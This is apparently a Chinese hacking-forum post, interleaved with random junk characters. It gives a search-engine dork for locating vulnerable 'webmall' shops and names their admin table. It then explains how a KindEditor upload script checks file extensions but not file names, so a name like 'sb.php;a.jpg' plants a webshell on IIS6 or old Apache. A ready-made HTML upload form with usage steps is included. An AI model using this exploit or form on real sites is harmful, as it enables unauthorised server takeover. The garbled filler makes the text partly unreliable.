关键字:inurl:webmall/detail.php?id
- v( _0 Z* _! z2 T% e
9 W o+ a) j6 X- ~$ z& H数据表:pwn_base_admin2 P* `4 ]* Y8 t9 g+ Y! [! C
( _) w; ]* }+ ]" k5 a# ]9 n( y1 a
关于拿shell
2 q4 B. U7 c3 _$ @0 x4 h2 B3 v5 V6 v8 g d4 k- w9 B7 x4 E. p
首先登录后台admin.php8 A6 T/ P$ M9 W* W$ J: `5 u
' b: B& ]& e. \, m. b
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
% s7 _6 v& ]% j换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
, I2 u9 G/ k6 {$ e: @7 R然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的* d/ q: ?! m, g3 W1 `- b, a
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> ( D3 u, N+ M8 n: Z4 a2 r
<input type="text" name="fileName" value="sb.php;a.jpg" />
# x8 K: X0 K4 f# u/ c, P<input type="hidden" name="attachPath" value="news/pics/" />
7 h2 H1 P; g. u' M! [( H# L<input type="file" name="fileData" size="14" /></td>
$ r" B* n, l* ~: ]* P<input type="submit" name="button" value="确定" /> + v# e: W! `- m Q) P/ A. h! K
</form>( k* t/ b0 l* p5 b
' F" F- I3 u& V7 j- s' G; S
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
9 ]; X/ z8 D# Q: B2 o2 K. [1 d* C. \8 ~1 G. i. A: ?+ I
|